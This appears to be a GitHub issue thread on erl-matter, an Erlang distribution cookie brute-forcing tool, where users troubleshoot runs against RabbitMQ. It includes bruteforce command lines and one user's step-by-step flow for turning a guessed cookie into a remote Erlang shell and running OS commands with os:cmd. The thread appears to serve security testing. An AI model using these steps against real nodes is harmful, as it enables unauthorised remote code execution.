bruteforce-erldp issues about erl-matter HOT 5 CLOSED

Erlang distribution protocol has evolved into several versions, and a bitfield of flags announcing supported features is present in the very first message sent by the client.

rabbitmq docker - note that it may be the Erlang VM or rabbitmq - now complains about client not supporting BIG_CREATION. The exact message is <0.1084.0> ** rabbit@56c973cf33ac: Connection attempt from node bruteforce0000@erldp rejected since it cannot handle ["BIG_CREATION"].**

The Erlang distribution documentation defines it, and I have tested both the NSE script and the bruteforce program to use it.

I have also tested shell-erldp.py, but it has failed, probably requiring a more careful analysis about the impacts of announcing the new flag as supported.

I will leave the issue open, but you can pull the latest commit to give a try with bruteforce-erldp.

from erl-matter.

Hi Michael,

You are absolutely right, and I am confused about the example not being coherent with the usage output. I will fix it.

Now regarding your issue, the message received is snot_allowed.

This message comes earlier than the authentication attempt, so it must be something different than seed and cookie being wrong.

Based on the port you reach, I guess that the remote is a rabbitmq process, so I will try to download the latest rabbitmq container and test against it.

I will give you an update soon.

from erl-matter.

Yes, I was using it against rabbitmq. Thanks for the update - seems to work just fine now. In regards to the shell piece, here was the general flow that I was using to show impact once the cookie has been guessed.

0. Install rabbitmq-server to provide the CLI tools
   sudo apt install rabbitmq-server -y

1. Set /etc/hosts
   Xx.xx.xx.xx remote_host_name

2. Set .erlang_cookie in /root/.erlang.cookie; /var/lib/rabbitmq/.erlang.cookie

   • I had to start and restart the service for this to take effect.
     sudo rabbitmqctl stop_app
service rabbitmq-server restart

3. Join cluster of the remote node
   rabbitmqctl join_cluster rabbit@<remote_host_name>

4. Use the cookie to connect to an erlang shell
   erl -setcookie AAA..........A -sname <new_name> -remsh rabbit@<remote_host_name>

5. Execute Remote Commands
   os:cmd('hostname').

from erl-matter.

So, did something changed here? because I'm still facing same issue:

> ./bruteforce-erldp --threads=1 --seed-start=381410768 --seed-end=386584488 --gap=1000 <IP> <PORT>

./bruteforce-erldp: unrecognized option '--seed-start=381410768'
./bruteforce-erldp: unrecognized option '--seed-end=386584488'
bruteforce using 1 concurrent threads
./bruteforce-erldp: unrecognized option '--seed-start=381410768'
./bruteforce-erldp: unrecognized option '--seed-end=386584488'
Erlang distribution cookie bruteforce is starting, sweeping through 0 seed intervals
Segmentation fault

Even tried the mentioned interval:

> ./bruteforce-erldp --interval=430413359,431413359,6.24 <IP> <PORT>

bruteforce using 64 concurrent threads
creating new interval 430413359 -> 431413359 6.240000
Erlang distribution cookie bruteforce is starting, sweeping through 1 seed intervals
could not read, 'Connection reset by peer'
could not receive send_status
could not read, 'Connection reset by peer'
could not receive send_status
could not read, 'Connection reset by peer'
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
...
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
 0 seed/s (64 conn/s, 0 fails/s)                0.00000% (1/1)

What did I not do right?

EDIT: Whoops, wrong port :)
Didn't know I have to tackle the rabbit port, instead I was running it on epmd port!

from erl-matter.

the options do no longer work. So use the interval way, and the other problem is gone by now it seems (port issue)

from erl-matter.